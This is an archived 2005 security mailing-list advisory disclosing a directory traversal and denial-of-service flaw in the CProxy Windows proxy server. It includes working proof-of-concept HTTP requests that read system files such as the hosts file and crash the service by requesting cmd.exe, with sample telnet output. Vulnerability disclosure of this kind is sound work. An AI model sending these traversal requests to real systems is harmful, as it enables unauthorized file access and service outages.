[NT] Directory Traversal In CProxy

From: SecuriTeam (support_at_securiteam.com)
Date: 03/07/05

  • Next message: SecuriTeam: "[NEWS] Multiply Vulnerabilities With Computer Associates License (Multiply Buffer Overflows, Directory Traversal)"
    To: list@securiteam.com
    Date: 7 Mar 2005 10:35:33 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Directory Traversal In CProxy
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.computalynx.com/> CProxy is a Windows based (95/98 and NT4
    and 2000) software solution that provides a single point of contact
    between your network and the Internet.

    Because of inadequate input validation, a malicious attacker can perform a
    directory traversal attack and thus gain access to arbitrary files located
    on the CProxy Server system. Using the same attack vector with especially
    crafted HTTP requests, it is possible to crash the CProxy service running
    on the remote system.

    DETAILS

    Vulnerable Systems:
     * Computalynx CProxy 3.3 family for Win32.
     * Computalynx CProxy 3.4.x (3.4.4 inclusive) for Win32.

    When performing proxy functions, CProxy Server is vulnerable to a
    directory traversal attack. Inadequate input validation and input
    filtering allows a remote attacker to gain attack to arbitrary files on
    the Windows system upon which the CProxy Server software has been
    deployed. This lies within the fact that the CProxy Server fails to filter
    out directory traversal attacks and in turn fails to protect arbitrary
    files from being requested and opened using the proxy service. An
    especially crafted URL allows allows arbitrary files to be recovered from
    the system. The retrieval of system files can compromise the entire system
    or expose the system to further avenues of attack. A malicious attacker
    can perform a request using the following format to gain access to
    arbitrary data.

    Proof of concept:
    GET http://>/<filename> HTTP/1.0<CRLF><CRLF>

    An attacker can gain access to a file in the WINNT directory as shown in
    the following example, by connecting to CProxy Server's proxy service
    (listening on TCP port 8080 by default), and preforming a request.

    Proof of concept:
    [user@host ~]$ telnet 10.0.0.1 8080
       Trying 10.0.0.1...
       Connected to 10.0.0.1.
       Escape character is '^]'.
       GET
    http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0
                                                                               
                                                                               
                                                 
       HTTP/1.0 200 OK
       Content-length: 734
       Date: Sat, 19 Feb 2005 21:09:58 GMT
       Date: Sat, 19 Feb 2005 21:09:58 GMT
       # Copyright (c) 1993-1999 Microsoft Corp.
       #
       # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
       #
       # This file contains the mappings of IP addresses to host names. Each
       # entry should be kept on an individual line. The IP address should
       # be placed in the first column followed by the corresponding host
    name.
       # The IP address and the host name should be separated by at least one
       # space.
       #
       # Additionally, comments (such as these) may be inserted on individual
       # lines or following the machine name denoted by a '#' symbol.
       #
       # For example:
       #
       # 102.54.94.97 rhino.acme.com # source server
       # 38.25.63.10 x.acme.com # x client host
                                 
       127.0.0.1 localhost
       Connection closed by foreign host.

    When retrieving an arbitrary ASCII file using the "GET" method, causes the
    file to be displayed and immediately afterwards causes the CProxy Server
    service to crash with an error message indicating that "memory could not
    be read". However, when retrieving this same ASCII file using the "POST"
    or "HEAD" methods, will cause the file contents to be displayed and does
    not crash the CProxy Server service, allowing an attacker to execute
    multiple requests and thus allowing various arbitrary files to be
    retrieved from the CProxy Server system.

    Proof of concept:
    "POST http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"
    "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"

    When attempting to retrieve an executable file using any of these HTTP
    method ("GET", "HEAD", or "POST"), in the aforementioned manner, will
    cause the contents of the executable file contents to be displayed and the
    CProxy Server service to crash with an error message of "memory could not
    be read", rendering the service unavailable, thus resulting in a
    Denial-of-Service condition.

    Proof of concept:
    "GET http://../../../../../winnt/system32/cmd.exe"
    "POST http://../../../../../winnt/system32/cmd.exe"

    Disclosure Timeline:
    19/02/2005 - Computalynx contacted regarding this issue.
    02/03/2005 - At present, the vendor has not replied regarding this issue.

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:kristof.philipsen@ubizen.com> Kristof Philipsen.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NEWS] Multiply Vulnerabilities With Computer Associates License (Multiply Buffer Overflows, Directory Traversal)"

    Relevant Pages

    • [UNIX] phpSysInfo Multiple Vulnerabilities (HTTP_ACCEPT_LANGUAGE, sensor_program, VERSION, charset)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities have been discovered in phpSysInfo allowing ... the attacker to additionally inject the $lng parameter. ... $sensor_program can *still* be used to inject active ...
      (Securiteam)
    • [UNIX] KDE URI handler vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A bug in KDE can be used by an attacker to create or truncate arbitrary ... The KDE URI handler does not perform adequate filtering ...
      (Securiteam)
    • [NT] PicoWebServer Unicode Stack Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A buffer overflow vulnerability has been discovered in PicoWebServer, ... exploiting this vulnerability allows a remote attacker to run arbitrary ... an attacker can trigger a stack overflow and cause the ...
      (Securiteam)
    • [NEWS] @Mail Web Interface Multiple Security Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... attacker to point it to mailbox of any registered user in @Mail system. ... Vulnerability 2: SQL database install - Multiple SQL Injection ...
      (Securiteam)
    • [NT] Citrix Neighborhood Agent Buffer Overflow and Arbitrary Shortcut Creation
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Server Client and facilitates access to Citrix published applications. ... an attacker must determine the length of the ...
      (Securiteam)